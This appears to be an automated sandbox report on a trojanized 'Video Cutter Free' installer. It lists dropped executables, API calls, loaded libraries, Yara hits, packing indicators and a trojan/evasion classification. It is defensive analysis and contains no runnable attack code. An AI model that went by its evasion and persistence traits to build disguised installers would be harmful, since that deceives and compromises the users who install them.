Source: sqlite3.dll.5.dr | Static PE information: Number of sections : 19 > 10
Source: is-PTGV1.tmp.1.dr | Static PE information: Number of sections : 19 > 10
Source: imMQqf6YWk.exe, 00000000.00000003.2012312615.0000000002158000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs imMQqf6YWk.exe
Source: imMQqf6YWk.exe, 00000000.00000003.2012131202.0000000002380000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs imMQqf6YWk.exe
Source: imMQqf6YWk.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: videocutterfree.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DVCMediaPlugin.exe.5.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engine | Classification label: mal84.troj.evad.winEXE@10/30@0/2
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_0099F670 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError, 5_2_0099F670
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_004555E4
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA, 1_2_00455E0C
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: CloseServiceHandle,CreateServiceA,CloseServiceHandle, 5_2_004028D6
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0046DF58 GetVersion,CoCreateInstance, 1_2_0046DF58
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource, 0_2_00409BEC
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: 5_2_00402520 StartServiceCtrlDispatcherA, 5_2_00402520
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Programs
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | File created: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp
                    Source: Yara match | File source: 5.0.videocutterfree.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000005.00000000.2025991381.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.3874521806.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-E132I.tmp, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe, type: DROPPED
                    Source: Yara match | File source: C:\ProgramData\DVCMediaPlugin\DVCMediaPlugin.exe, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File read: C:\Windows\win.ini
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                    Source: videocutterfree.exe, videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: videocutterfree.exe, videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.dr | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: videocutterfree.exe, videocutterfree.exe, 00000005.00000002.3875208407.000000006096F000.00000002.00000001.01000000.0000000A.sdmp, videocutterfree.exe, 00000005.00000003.2030188415.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.5.dr, is-PTGV1.tmp.1.dr | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: imMQqf6YWk.exe | ReversingLabs: Detection: 23%
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | File read: C:\Users\user\Desktop\imMQqf6YWk.exe
                    Source: unknown | Process created: C:\Users\user\Desktop\imMQqf6YWk.exe "C:\Users\user\Desktop\imMQqf6YWk.exe"
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Process created: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp "C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp" /SL5="$2042A,3667024,54272,C:\Users\user\Desktop\imMQqf6YWk.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" pause video_cutter_free_12102
                    Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Process created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe "C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe" -i
                    Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 pause video_cutter_free_12102
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: textinputframework.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: coreuicomponents.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: coremessaging.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: shfolder.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: msacm32.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: winmmbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: riched20.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: usp10.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: msls31.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: explorerframe.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: sfc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Section loaded: sfc_os.dll
                    Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
                    Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: sqlite3.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: appxsip.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: opcservices.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll
                    Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll
                    Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll
                    Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Window found: window name: TMainForm
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Video Cutter Free_is1
                    Source: imMQqf6YWk.exe | Static file information: File size 3915755 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-LDIKA.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-2IP8E.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-LDIKA.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-IBF1C.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-2IP8E.tmp.1.dr

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Unpacked PE file: 5.2.videocutterfree.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.adtt3:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Unpacked PE file: 5.2.videocutterfree.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004502C0
                    Source: videocutterfree.exe.1.dr | Static PE information: section name: .adtt3
                    Source: is-PTGV1.tmp.1.dr | Static PE information: section name: /4
                    Source: is-PTGV1.tmp.1.dr | Static PE information: section name: /19
                    Source: is-PTGV1.tmp.1.dr | Static PE information: section name: /35
                    Source: is-PTGV1.tmp.1.dr | Static PE information: section name: /51
                    Source: is-PTGV1.tmp.1.dr | Static PE information: section name: /63
                    Source: is-PTGV1.tmp.1.dr | Static PE information: section name: /77
                    Source: is-PTGV1.tmp.1.dr | Static PE information: section name: /89
                    Source: is-PTGV1.tmp.1.dr | Static PE information: section name: /102
                    Source: is-PTGV1.tmp.1.dr | Static PE information: section name: /113
                    Source: is-PTGV1.tmp.1.dr | Static PE information: section name: /124
                    Source: is-IBF1C.tmp.1.dr | Static PE information: section name: Shared
                    Source: DVCMediaPlugin.exe.5.dr | Static PE information: section name: .adtt3
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /4
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /19
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /35
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /51
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /63
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /77
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /89
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /102
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /113
                    Source: sqlite3.dll.5.dr | Static PE information: section name: /124
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_00408104 push ecx; mov dword ptr [esp], eax 0_2_00408109
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\imMQqf6YWk.exe | Code function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0040994C push 00409989h; ret 1_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00483A6C push 00483B7Ah; ret 1_2_00483B72
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax 1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx 1_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0049481C push ecx; mov dword ptr [esp], ecx 1_2_00494821
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx 1_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0048515C push ecx; mov dword ptr [esp], ecx 1_2_00485161
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00459120 push 00459164h; ret 1_2_0045915C
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx 1_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx 1_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00477628 push ecx; mov dword ptr [esp], edx 1_2_00477629
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_004519BC push ecx; mov dword ptr [esp], eax 1_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_0045FB90 push ecx; mov dword ptr [esp], ecx 1_2_0045FB94
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx 1_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | Code function: 1_2_00499D1C pushad ; retf 1_2_00499D2B
                    Source: videocutterfree.exe.1.dr | Static PE information: section name: .text entropy: 7.74765022174978
                    Source: DVCMediaPlugin.exe.5.dr | Static PE information: section name: .text entropy: 7.74765022174978

                    Persistence and Installation Behavior

                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 5_2_00401A4F
                    Source: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 5_2_0099E652
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\videocutterfree.exe
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-IBF1C.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-1BCLB.tmp\imMQqf6YWk.tmp | File created: C:\Users\user\AppData\Local\Video Cutter Free 1.16\is-PTGV1.tmp
